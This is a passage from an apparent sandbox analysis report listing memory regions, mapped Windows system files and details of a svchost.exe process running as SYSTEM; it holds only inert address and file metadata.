0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 856 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 857 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 858 start_va = 0x2c80000 end_va = 0x35affff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 859 start_va = 0x280000 end_va = 0x284fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 860 start_va = 0x35b0000 end_va = 0x39affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035b0000" filename = "" Thread: id = 24 os_tid = 0xe34 Thread: id = 25 os_tid = 0xe40 Thread: id = 26 os_tid = 0xe44 Thread: id = 27 os_tid = 0xe48 Thread: id = 28 os_tid = 0xe4c Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x76036000" os_pid = "0x364" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d1f9" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 1021 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1022 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1023 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1024 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1025 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1026 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1027 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 1028 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1029 start_va = 0xf0000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1030 start_va = 0x170000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 1031 start_va = 0x230000 end_va = 0x32ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1032 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 1033 start_va = 0x340000 end_va = 0x340fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 1034 start_va = 0x350000 end_va = 0x35afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 1035 start_va = 0x360000 end_va = 0x36cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1036 start_va = 0x370000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1037 start_va = 0x3f0000 end_va = 0x3f3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 1038 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1039 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1040 start_va = 0x510000 end_va = 0x697fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 1041 start_va = 0x6a0000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 1042 start_va = 0x830000 end_va = 0x839fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 1043 start_va = 0x840000 end_va = 0x841fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 1044 start_va = 0x850000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 1045 start_va = 0x8d0000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 1046 start_va = 0x950000 end_va = 0x953fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1047 start_va = 0x960000 end_va = 0x9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 1048 start_va = 0x9e0000 end_va = 0xa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009e0000" filename = "" Region: id = 1049 start_va = 0xa60000 end_va = 0xa60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 1050 start_va = 0xa70000 end_va = 0xa71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 1051 start_va = 0xa80000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 1052 start_va = 0xab0000 end_va = 0xb2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 1053 start_va = 0xb30000 end_va = 0xb33fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1054 start_va = 0xb40000 end_va = 0xb4dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 1055 start_va = 0xb50000 end_va = 0xb57fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 1056 start_va = 0xb60000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 1057 start_va = 0xb70000 end_va = 0xb70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 1058 start_va = 0xb80000 end_va = 0xb80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 1059 start_va = 0xb90000 end_va = 0xb90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b90000" filename = "" Region: id = 1060 start_va = 0xba0000 end_va = 0xba0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ba0000" filename = "" Region: id = 1061 start_va = 0xbb0000 end_va = 0xbc9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bb0000" filename = "" Region: id = 1062 start_va = 0xbd0000 end_va = 0xbd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1063 start_va = 0xbe0000 end_va = 0xbe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000be0000" filename = "" Region: id = 1064 start_va = 0xbf0000 end_va = 0xebefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1065 start_va = 0xec0000 end_va = 0xf25fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1066 start_va = 0xf30000 end_va = 0xf4bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 1067 start_va = 0xf50000 end_va = 0xf50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f50000" filename = "" Region: id = 1068 start_va = 0xf60000 end_va = 0xf60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 1069 start_va = 0xf70000 end_va = 0xf7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 1070 start_va = 0xf80000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 1071 start_va = 0xf90000 end_va = 0xf9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 1072 start_va = 0xfa0000 end_va = 0xfaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fa0000" filename = "" Region: id = 1073 start_va = 0xfb0000 end_va = 0xfbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fb0000" filename = "" Region: id = 1074 start_va = 0xfc0000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fc0000" filename = "" Region: id = 1075 start_va = 0xfd0000 end_va = 0xfd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1076 start_va = 0xfe0000 end_va = 0xfeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 1077 start_va = 0xff0000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 1078 start_va = 0x1000000 end_va = 0x100ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 1079 start_va = 0x1010000 end_va = 0x1010fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001010000" filename = "" Region: id = 1080 start_va = 0x1020000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001020000" filename = "" Region: id = 1081 start_va = 0x10a0000 end_va = 0x10a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 1082 start_va = 0x10b0000 end_va = 0x10b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 1083 start_va = 0x10c0000 end_va = 0x113ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 1084 start_va = 0x1140000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 1085 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Region: id = 1086 start_va = 0x1160000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 1087 start_va = 0x1170000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001170000" filename = "" Region: id = 1088 start_va = 0x1180000 end_va = 0x118ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 1089 start_va = 0x1190000 end_va = 0x119ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 1090 start_va = 0x11a0000 end_va = 0x11affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1091 start_va = 0x11b0000 end_va = 0x11b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 1092 start_va = 0x11c0000 end_va = 0x11cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 1093 start_va = 0x11d0000 end_va = 0x11dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 1094 start_va = 0x11e0000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011e0000" filename = "" Region: id = 1095 start_va = 0x11f0000 end_va = 0x126ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 1096 start_va = 0x1270000 end_va = 0x127ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1097 start_va = 0x1280000 end_va = 0x1287fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 1098 start_va = 0x1290000 end_va = 0x129ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 1099 start_va = 0x12a0000 end_va = 0x12affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012a0000" filename = "" Region: id = 1100 start_va = 0x12b0000 end_va = 0x12bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 1101 start_va = 0x12c0000 end_va = 0x133ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 1102 start_va = 0x1340000 end_va = 0x134ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001340000" filename = "" Region: id = 1103 start_va = 0x1350000 end_va = 0x1357fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 1104 start_va = 0x1360000 end_va = 0x136ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001360000" filename = "" Region: id = 1105 start_va = 0x13a0000 end_va = 0x141ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013a0000" filename = "" Region: id = 1106 start_va = 0x1480000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001480000" filename = "" Region: id = 1107 start_va = 0x14a0000 end_va = 0x151ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014a0000" filename = "" Region: id = 1108 start_va = 0x1530000 end_va = 0x15affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 1109 start_va = 0x15f0000 end_va = 0x166ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015f0000" filename = "" Region: id = 1110 start_va = 0x16b0000 end_va = 0x172ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016b0000" filename = "" Region: id = 1111 start_va = 0x1730000 end_va = 0x17affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 1112 start_va = 0x17d0000 end_va = 0x184ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017d0000" filename = "" Region: id = 1113 start_va = 0x1850000 end_va = 0x18cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 1114 start_va = 0x18e0000 end_va = 0x195ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018e0000" filename = "" Region: id = 1115 start_va = 0x1980000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 1116 start_va = 0x1a70000 end_va = 0x1aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a70000" filename = "" Region: id = 1117 start_va = 0x1af0000 end_va = 0x1beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001af0000" filename = "" Region: id = 1118 start_va = 0x1bf0000 end_va = 0x1c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 1119 start_va = 0x1c80000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 1120 start_va = 0x1d90000 end_va = 0x1e0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 1121 start_va = 0x1e30000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 1122 start_va = 0x1eb0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001eb0000" filename = "" Region: id = 1123 start_va = 0x1fb0000 end_va = 0x202ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 1124 start_va = 0x2050000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1125 start_va = 0x2130000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 1126 start_va = 0x21c0000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 1127 start_va = 0x22b0000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 1128 start_va = 0x2330000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 1129 start_va = 0x2370000 end_va = 0x23affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 1130 start_va = 0x23d0000 end_va = 0x244ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023d0000" filename = "" Region: id = 1131 start_va = 0x2450000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 1132 start_va = 0x24d0000 end_va = 0x258ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1133 start_va = 0x2590000 end_va = 0x268ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 1134 start_va = 0x26a0000 end_va = 0x279ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 1135 start_va = 0x27a0000 end_va = 0x281ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027a0000" filename = "" Region: id = 1136 start_va = 0x2840000 end_va = 0x28bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 1137 start_va = 0x28c0000 end_va = 0x29bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 1138 start_va = 0x29c0000 end_va = 0x29cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 1139 start_va = 0x29d0000 end_va = 0x2a4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 1140 start_va = 0x2a70000 end_va = 0x2a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 1141 start_va = 0x2aa0000 end_va = 0x2b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002aa0000" filename = "" Region: id = 1142 start_va = 0x2bf0000 end_va = 0x2c6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 1143 start_va = 0x2c70000 end_va = 0x2ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 1144 start_va = 0x2cf0000 end_va = 0x2deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002cf0000" filename = "" Region: id = 1145 start_va = 0x2e20000 end_va = 0x2e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e20000" filename = "" Region: id = 1146 start_va = 0x2ea0000 end_va = 0x309ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 1147 start_va = 0x3120000 end_va = 0x319ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1148 start_va = 0x31b0000 end_va = 0x322ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 1149 start_va = 0x32c0000 end_va = 0x33bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 1150 start_va = 0x33d0000 end_va = 0x344ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 1151 start_va = 0x3460000 end_va = 0x34dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 1152 start_va = 0x3560000 end_va = 0x35dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 1153 start_va = 0x35f0000 end_va = 0x366ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 1154 start_va = 0x3720000 end_va = 0x379ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003720000" filename = "" Region: id = 1155 start_va = 0x37c0000 end_va = 0x383ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037c0000" filename = "" Region: id = 1156 start_va = 0x3880000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003880000" filename = "" Region: id = 1157 start_va = 0x3910000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003910000" filename = "" Region: id = 1158 start_va = 0x3990000 end_va = 0x3d8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003990000" filename = "" Region: id = 1159 start_va = 0x3d90000 end_va = 0x3e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d90000" filename = "" Region: id = 1160 start_va = 0x3ef0000 end_va = 0x3efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ef0000" filename = "" Region: id = 1161 start_va = 0x3f10000 end_va = 0x3f8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003f10000" filename = "" Region: id = 1162 start_va = 0x3fe0000 end_va = 0x405ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fe0000" filename = "" Region: id = 1163 start_va = 0x4080000 end_va = 0x40fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004080000" filename = "" Region: id = 1164 start_va = 0x4120000 end_va = 0x419ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1165 start_va = 0x41c0000 end_va = 0x423ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 1166 start_va = 0x4260000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004260000" filename = "" Region: id = 1167 start_va = 0x4320000 end_va = 0x439ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 1168 start_va = 0x43a0000 end_va = 0x441ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000043a0000" filename = "" Region: id = 1169 start_va = 0x4420000 end_va = 0x461ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004420000" filename = "" Region: id = 1170 start_va = 0x4630000 end_va = 0x46affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004630000" filename = "" Region: id = 1171 start_va = 0x46f0000 end_va = 0x476ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046f0000" filename = "" Region: id = 1172 start_va = 0x4780000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004780000" filename = "" Region: id = 1173 start_va = 0x4820000 end_va = 0x489ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004820000" filename = "" Region: id = 1174 start_va = 0x4970000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004970000" filename = "" Region: id = 1175 start_va = 0x49f0000 end_va = 0x4aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 1176 start_va = 0x4af0000 end_va = 0x4beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 1177 start_va = 0x4bf0000 end_va = 0x4ceffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004bf0000" filename = "" Region: id = 1178 start_va = 0x4cf0000 end_va = 0x4deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004cf0000" filename = "" Region: id = 1179 start_va = 0x4df0000 end_va = 0x5deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004df0000" filename = "" Region: id = 1180 start_va = 0x774c0000 end_va = 0x775defff monitored = 0 entry_point = 0x774d5340 region_type = 